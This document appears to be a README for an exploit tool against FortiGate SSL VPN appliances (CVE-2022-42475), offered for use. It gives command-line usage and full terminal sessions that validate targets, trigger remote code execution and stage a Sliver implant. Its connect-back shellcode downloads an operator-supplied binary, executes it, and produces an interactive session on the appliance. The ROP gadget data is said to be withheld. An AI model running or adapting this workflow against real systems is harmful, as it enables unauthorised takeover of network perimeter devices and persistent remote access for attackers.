## https://sploitus.com/exploit?id=48414925-3DD2-506A-921C-DECB9FEB0EA0
# CVE-2022-42475
## Background
This is the exploit for the blog post here: https://bishopfox.com/blog/exploit-cve-2022-42475
## Redacted Version
This version of the exploit will not work without you, the hacker, supplying the necessary memory addresses for ROP gadgets, etc. The work to determine these data is confidential and proprietary to Bishop Fox and I will not (cannot) publish it alongside this exploit. I trust you understand!
## Modes of operation
* Validate only, no exploit. Determines if vulnerable. No payload, no shellcode.
* __Exploit, but verify only__. Run benign connect-back "ping" shellcode to verify the target is exploitable.
* __Exploit with connect-back binary stager__. The shellcode connects back to the exploit, downloads an encrypted operator-supplied binary file (typically [https://gitub.com/BishopFox/Sliver](Sliver)), decrypts the binary, then calls `execve(binary_file)`.
**Note**: At present the "validate only" mode works across all known versions of FortiOS. However, exploits work _only_ against FortiOS 6.0.4 on 100D hardware. I no longer work at BF and therefore cannot publish the expanded exploit that supports something like 18k targets.
## Requirements
* PyCrypto
* pycryptodome
```
pip3 install PyCrypto
pip3 install pycryptodome
```
## Validate only
This will not make any attempt to exploit the bug, but instead triggers it as a crash (the remote SSL VPN daemon restarts automatically and immediately). The crash is detected heuristically and reported to the operator.
Run it using the `-v` validate flag:
```
$ ./x.py -t 192.168.0.10 -p 8443 -v
--[ CVE-2022-42475: FortiGate Remote Pre-auth RCE ]--
--[ Bishop Fox Cosmos Team X ]--
[+] Running in validate-only mode. No RCE.
[>] Testing to see if target is vulnerable (may take 10 seconds)
[+] Target '192.168.0.10:8443' appears to be VULNERABLE
```
## Exploit, but validate (feature only available for FortiOS 6.0.4 on 100D appliances at present)
This will trigger the bug, deploy a ROP chain, and jump to shellcode. The shellcode is benign and works as follows:
* Exploit connects to target and triggers the vuln to execute shellcode
* Shellcode connects back to operator's IP:port
* Shellcode sends a single "hello" byte to the exploit: `0xbf`
* Exploit delivers a small encrypted test payload to the shellcode (AES key is random each run)
* Shellcode decrypts the payload and saves it to `/tmp/x` on the FortiGate appliance
* Shellcode sends another single `0xbf` byte to the exploit if payload decryption was successful
* Exploit reads the byte and confirms code execution.
Flags:
```
-t target host/IP
-p target port
-e exploit mode
-c connect-back only mode
-H and -P operator's IP:port (required)
-s software version of FortiOS (required)
-m hardware model running FortiOS
-d turn on debugging
```
An example where we select both software version `6.0.4` and the appliance model `100D`:
```
┌──(kali㉿kali)-[/mnt/hgfs/fortios/CVE-2022-42475]
└─$ sudo ./x.py -t 192.168.0.10 -p 8443 -e -c -H 192.168.0.99 -P 443 -s 6.0.4 -m 100D 130 ⨯
--[ CVE-2022-42475: FortiGate Remote Pre-auth RCE ]--
--[ Bishop Fox Cosmos Team X ]--
[+] Generating random 128-bit AES key to encrypt payload
[+] Encrypting payload...
[+] Using cached shellcode. Edit ./x.py (look for 'shellcode.s') to force refresh.
[+] Configured for connect-back to 192.168.0.99:443
[+] Starting encrypted payload listener...
[+] Preparing for exploit...
[+] Sending request!
[+] Importing gadgets from 'exploit_data.json'
[ mtls -l 8888
[*] Starting mTLS listener ...
[*] Successfully started job #1
```
Exploit:
```
$ ./x.py -t 192.168.0.10 -p 8443 -e -f implant5 -H 192.168.0.99 -P 443 -s 6.0.4 -m 100D
--[ CVE-2022-42475: FortiGate Remote Pre-auth RCE ]--
--[ Bishop Fox Cosmos Team X ]--
[+] Exploit will attempt to execve("implant5") on the target
...
[ use d8d5344b-c666-4c60-9e33-5ce50eb82cad
[*] Active session implant5 (d8d5344b-c666-4c60-9e33-5ce50eb82cad)
[server] sliver (implant5) > whoami
Logon ID:
[server] sliver (implant5) > ls
/ (19 items, 10.0 KiB)
======================
-rw-r--r-- .ash_history 590 B Tue Jan 31 11:31:57 +0000 2023
drwxr-xr-x bin Tue Jan 31 11:04:35 +0000 2023
drwxr-xr-x data Tue Jan 31 05:24:10 +0000 2023
drwxr-xr-x data2 Tue Jan 31 11:40:01 +0000 2023
drwxr-xr-x dev Tue Jan 31 05:26:16 +0000 2023
Lrwxrwxrwx etc -> data/etc 8 B Mon Jan 07 18:03:23 +0000 2019
Lrwxrwxrwx fortidev -> / 1 B Mon Jan 07 18:03:23 +0000 2019
Lrwxrwxrwx init -> /sbin/init 10 B Mon Jan 07 18:03:23 +0000 2019
drwxr-xr-x lib Mon Jan 07 18:03:30 +0000 2019
Lrwxrwxrwx lib64 -> lib 3 B Mon Jan 07 18:03:23 +0000 2019
drwxr-xr-x migadmin Tue Jan 31 05:23:26 +0000 2023
dr-xr-xr-x proc Tue Jan 31 05:23:13 +0000 2023
drwx------ root Mon Jan 07 17:17:34 +0000 2019
drwxr-xr-x sbin Tue Jan 31 05:23:27 +0000 2023
drwxr-xr-x security-rating Mon Jan 07 18:01:04 +0000 2019
drwxr-xr-x sys Tue Jan 31 05:23:27 +0000 2023
dtrwxrwxrwx tmp Tue Jan 31 11:40:01 +0000 2023
drwxr-xr-x usr Tue Jan 31 05:23:27 +0000 2023
drwxr-xr-x var Tue Jan 31 05:24:07 +0000 2023
```
Note that Sliver returns `` because FortiOS is kinda mostly sorta Linux, and doesn't always work the way that you'd expect. This is an issue with FortiOS, not Sliver.
## More versions coming soon
I no longer work at Bishop Fox so you'll need to follow the BF github for updates on this.